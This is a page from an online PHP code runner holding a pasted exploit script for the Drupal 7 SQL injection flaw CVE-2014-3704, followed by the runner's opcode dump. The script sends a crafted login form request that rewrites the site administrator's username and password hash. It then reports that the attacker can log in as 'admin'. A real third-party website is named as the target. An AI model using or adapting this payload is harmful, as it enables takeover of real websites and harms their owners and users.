3v4l.org

run code in 300+ PHP versions simultaneously
<?php// Title : Drupal Core 7.x Prior 7.32 - SQL Injection// Author : sn// Link : http://www.drupal.com// Version: 7.x Prior to 7.32// CVE : CVE-2014-3704// Site : http://siph0n.net// Config$site = "http://claro.com.br"; // site & site dir$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";//$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $site . "/?q=node&destination=node");curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$server_output = curl_exec($ch);curl_close($ch);if(strpos($server_output, "mb_strlen() expects parameter 1 to be string")) {echo "Success! Please login with \"admin\":\"admin\" at {$site}/user/login";} else {echo "Failed";}?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/boZOu
function name:  (null)
number of ops:  3
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    1     0  E >   FETCH_CONSTANT                                   ~0      'php'
          1        FREE                                                     ~0
          2      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
146.15 ms | 1383 KiB | 13 Q